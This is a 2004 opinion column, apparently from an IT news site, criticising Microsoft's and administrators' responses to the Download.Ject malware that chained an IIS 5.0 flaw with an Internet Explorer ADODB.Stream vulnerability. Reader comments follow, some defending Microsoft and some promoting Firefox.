News

A Trustworthy Response?

Everyone--Microsoft and its customers--needs to get more serious about the virus threat.

<>Analysis: Microsoft recently had another opportunity to demonstrate its Trustworthy Computing philosophy when the Download.Ject virus began infecting unpatched IIS 5.0 servers and various versions of Internet Explorer. Download.Ject is a novel virus in that it attacks along two vectors: It first infects an IIS 5.0 server using a known vulnerability (which has been patched for a while; shame on affected system administrators for not maintaining their systems). The server-side infection installs a JavaScript that redirects users to another Web server. That Web server, based in Russia, exploits the IE vulnerability to install a keystroke logger, capturing passwords and lots of other sensitive information. The IE vulnerability has to do with the ActiveX Data Objects' ADODB.Stream object, which represents a file in memory.

Microsoft's first response to Download.Ject was, in hindsight, a bit lackluster. It proudly announced, near the end of June, that it had taken down the Russian Web server. While that surely made Microsoft feel good, and immediately prevented any more infections, it didn't actually solve the problem. We know from experience with NetSky and MyDoom that Download.Ject variants were (and are) inevitable, and those variants will simply redirect users to a different Web server. Microsoft's second response, on July 2, was to issue a patch for IE, which didn't fix the problem. Instead, it essentially hacks the registry to disable the ADODB.Stream object (Knowledge Base article 870669 describes how to do it manually), defeating the vector Download.Ject uses but not fixing the vulnerability. It's all too feasible that some future Download.Ject variant could re-enable the vulnerability and continue to exploit it.

That's assuming, of course, that users bother to install the patch to begin with. They won't. We know they won't, because Download.Ject couldn't have spread if it weren't for unpatched IIS 5.0 systems to begin with. It's difficult to say how many times someone has to jump up and down on a table to attract administrators' attention to the importance of patch management. And the rhetoric about Microsoft's failure to provide comprehensive patch management tools, while true, is beginning to ring hollow: Keeping up with patches is an administrator's job. It's safe to assume that if administrators can't be bothered to patch a few Web servers, they won't be bothered to patch a few thousand Web browsers, either.

Microsoft does promise a long-term, true solution in the future. Apparently the holdup is in providing a tested, supportable patch for every extant version of IE. While I'm sure Microsoft isn't holding back on us, it's still difficult to imagine the circumstances which prevent a company with thousands of programmers from creating an effective patch more quickly. Still, perhaps it's no more difficult to imagine than a world where network administrators can't be bothered to turn on Automatic Updates for their Web servers and to subscribe to Microsoft's security bulletins.

What could Microsoft or we as an industry have done differently to prevent this potentially damaging Trojan?

First, administrators need to get on top of patch management. It's difficult to believe that the examples of Slammer and Blaster—two viruses which exploited already-patched vulnerabilities—haven't been sufficient. Clearly, administrators who haven't been hit yet think they never will be. It's a shame that they won't be goaded into doing the patch management part of their job—a job which, by the way, administrators all the way back to the mainframe days have had to deal with—until their environments are brutally hacked.

Second, Microsoft needs to get a plan, and ideally a dedicated team, in place for critical incident response. For example, the first patch Microsoft issued could have included a recommendation to block access to the IP address the server-side exploit redirected users to. It's hard to tell if that would have penetrated the ennui administrators seem to have regarding Microsoft security alerts; Microsoft's Web site has been crawling with Download.Ject warnings in the past few weeks and I'm sure there are still vulnerable IIS 5.0 servers out there.

A dedicated team might also help Microsoft issue actual patches, rather than "resiliency boosts," when difficult-to-patch problems arise. Management within Microsoft also needs to be willing to put the brakes on all future development, if necessary, to get patches out as quickly as possible. That's an incredibly difficult decision to make within any company, but the sheer number of people who are affected by any Windows-targeted attack makes it a necessary decision. It's great that Microsoft went after the Russian Web server; antivirus Web sites, however, are telling me that Download.Ject was discovered in February. Symantec provided virus definitions on June 16. As I'm writing this, nearly a month later, IE still hasn't been permanently patched.

So what's the bottom line? Everyone—Microsoft and its customers—needs to get more serious about the virus threat. It's a simple miracle that effective viruses like MyDoom, Slammer, Blaster, and Download.

Ject have caused as little damage as they have. Microsoft must continue to react quickly and decisively, and its customers must stop relying on Microsoft to "make it all better," and start taking more responsibility for the security of their own systems.

About the Author

With more than fifteen years of IT experience, Don Jones is one of the world’s leading experts on the Microsoft business technology platform. He’s the author of more than 35 books, including Windows PowerShell: TFM, Windows Administrator’s Scripting Toolkit, VBScript WMI and ADSI Unleashed, PHP-Nuke Garage, Special Edition Using Commerce Server 2002, Definitive Guide to SQL Server Performance Optimization, and many more. Don is a top-rated and in-demand speaker and serves on the advisory board for TechMentor. He is an accomplished IT journalist with features and monthly columns in Microsoft TechNet Magazine, Redmond Magazine, and on Web sites such as TechTarget and MCPMag.com. Don is also a multiple-year recipient of Microsoft’s prestigious Most Valuable Professional (MVP) Award, and is the Editor-in-Chief for Realtime Publishers.

comments powered by Disqus

Reader Comments:

Thu, Jun 12, 2008 Anonymous Anonymous

3b840d8d1b184f372ecbd3ac3693668e

Fri, Jul 30, 2004 Anonymous Anonymous

I find it strange the way some people think. The virus happens in Feb. It takes a virus co. 4 mos. to come out with a def. and it takes writers 5 mos. to write about it. And everyone hollers MS should have fixed IE the day after it happens. For myself I think MS is working it's tail off to insure a bunch of fixes it's about to release is foolproof enough to help IE and XP, and all of this billions of people will get for free. I'm just a regular end user (used to toggle my data in with switches then moved up to the ELF 1802 based processor chip, thought MS was a great help and aid when it first came out...I still do) but I think MS does a heck of a lot more for me and millions of others like me, trying to give me a good, stable, reliable and safe OS and browser, etc;. than tons of the software, firmware programmers and developers that have loads of commercial software ill written and designed as well as various hardware mfg cos. and most of those are not going to spend time, resources and money and give away major overhauls to millions for free. I have used several other OS's and browsers and have had fun and challange with all of them and I think they are all pretty good stuff. But I continue to this day to rely on MS, it's been on each machine i've built and tied to the internet for years...from 300 baud dial to dsl. It's handled things for me, my children, grand children and even my great grand children. It has been through a lot of use in my family to all points of the world. I have had an occasional virus, even had to scratch load. But those times were real rare, for the most part the sys (mach & OS) has run day after day year after year with little to no down time. Same thing at my job. But like everything else in this world, even love....it requires a little maintenance. 1st time I've posted at a site like this, I just happen to be reading the article and have gotten kind of tired of reading, seeing and hearing so much MS bashing happening everywhere. Some people don't seem to understand that with the dynamics of this logistics field, there is never really a permanent fix. By its very nature, evolution in this monolithic giant promises to be an ongoing daily battle, to be delt with using presistance and patients. I've noticed the majority that bashes MS do not post offerings of viable solutions, the big fix being replace browser or OS. These same group of folk, I wonder, do they haul their car to the wrecking yard if it fails to start, do they through their tv away and buy another if a fuse blows, do they exchange homes if a switch fails to turn on a light???????

Fri, Jul 30, 2004 Anonymous Anonymous

I agree that Microsoft owes us a quick and efficient patch that fully corrects the problem, not just a Band-Aid fix. However, the admins need to step up to the plate and apply those patches as soon as their available. After all, if Microsoft released a fully-functional patch on the day a virus was discovered it wouldn't matter if it isn't installed.
The admins should also stop taking the easy way out (relying on IE) and install Firefox. Sure it means supporting another browser, but the support required for Firefox is minimal compared to fighting a new virus at all hours of the night, then restoring from backups to hopefully fix what the virus trashed.

Fri, Jul 30, 2004 Anonymous Anonymous

Your news does not give clear instructions how to remove the virus. That would be better than sensational reasons etc
Would you not agree?

Michael Weissbraun

Thu, Jul 29, 2004 Anonymous Anonymous

The trustworthy response to IE security problems is to drop IE and w DOT ww.getfirefox.com.

Mozilla Firefox is more secure, and has a number of interesting features like tabbed browsing, google searches and pop-up blocking.

Moreover, Firefox won't let users to execute downloaded executables, reducing the virus risk.

Download Firefox now! You won't look back.

www.getfirefox.com

Thu, Jul 29, 2004 Anonymous Anonymous

The trustworthy response to IE security problems is to drop IE and get Mozilla Firefox. (www.getfirefox.com)

Mozilla Firefox is more secure, and has a number of interesting features like tabbed browsing, google searches and pop-up blocking.

Moreover, Firefox won't let users to execute downloaded executables, reducing the virus risk.

Go download Firefox now! You won't look back.

www.getfirefox.com

Add Your Comment Now:

Your Name:(optional)
Your Email:(optional)
Your Location:(optional)
Comment:
Please type the letters/numbers you see above

Redmond Tech Watch

Sign up for our newsletter.

I agree to this site's Privacy Policy.